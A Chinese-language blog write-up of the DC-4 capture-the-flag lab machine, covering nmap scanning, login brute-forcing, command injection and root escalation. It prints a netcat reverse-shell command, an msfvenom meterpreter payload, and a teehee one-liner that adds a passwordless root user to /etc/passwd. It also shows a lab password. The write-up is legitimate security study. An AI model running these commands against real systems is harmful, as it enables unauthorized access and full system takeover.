Damn1t
for you I bleed myself dry
FRIENDS
baidu

DC-4

2020-02-12 靶机

获取shell

利用nmap扫描内网主机,找到靶机ip:

1
2
3
4
5
6
7
8
9
nmap -Pn 192.168.43.0/24

Nmap scan report for dc-4 (192.168.43.157)
Host is up (0.00025s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DA:FB:D8 (Oracle VirtualBox virtual NIC)

开放了80端口,于是浏览器登入,呈现如下图

只有一个登陆页面,扫描目录没发现什么,指纹识别过后也没有发现什么特殊的,于是进行爆破
利用burp,intruder选择cluster bomb模式,构造用户名,爆破密码
最后找到

登入之后,发现可以执行命令

我们尝试截取请求,找到执行命令的入口

我们要获取shell,所以要试图写入文件,尝试发现wget可以使用

本来想在当前目录下上传webshell,但发现权限限制,于是转而直接执行命令:

1
nc 192.168.43.164 23333 -e /bin/bash

然后本机监听,获取到会话

为了让msf派上用场,我转到tmp目录下

然后攻击机生成一个木马:

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.164 LPORT=4444 -f elf > shell

攻击机开启网络服务:

1
/etc/init.d/apache2 start

将其上传到tmp目录,chmod +x shell 添加运行的权限
msf开启监听,得到会话:

提权

进行信息收集:

1
2
3
4
OS           : Debian 9.8 (Linux 4.9.0-3-686)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux

查看home目录:

1
2
3
4
5
6
7
8
9
# Listing: /home

Mode Size Type Last modified Name

------

40755/rwxr-xr-x 4096 dir 2019-04-07 02:31:02 +0800 charles
40755/rwxr-xr-x 4096 dir 2019-04-07 02:30:51 +0800 jim
40755/rwxr-xr-x 4096 dir 2019-04-07 02:31:09 +0800 sam

只有jim下的目录可以进入

1
2
3
40755/rwxr-xr-x   4096  dir   2019-04-07 00:58:03 +0800  backups
100600/rw------- 528 fil 2019-04-06 18:20:21 +0800 mbox
104777/rwxrwxrwx 174 fil 2019-04-06 18:59:11 +0800 test.sh

backups下有一个密码文件old-passwords.bak,猜测是jim的密码

于是尝试hydra 爆破

ssh登入

查看mbox,发现是一封来自root的邮件

注意到登入的时候提示了/var/mail下有一封邮件,于是查看发现有一个jim的文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

得到了charles的密码,登录之后,使用sudo -l查看当前可使用的命令:

1
2
3
4
5
6
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee

/usr/bin/teehee --help查看其如何使用,列出如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

于是向passwd直接写入:

1
echo "hello::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

成功提权,得到flag:

Author: damn1t

Link: http://microvorld.com/2020/02/12/靶机/DC-4/

Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.

< PreviousPost
DC-5
NextPost >
apt-笔记
CATALOG
  1. 1. 获取shell
  2. 2. 提权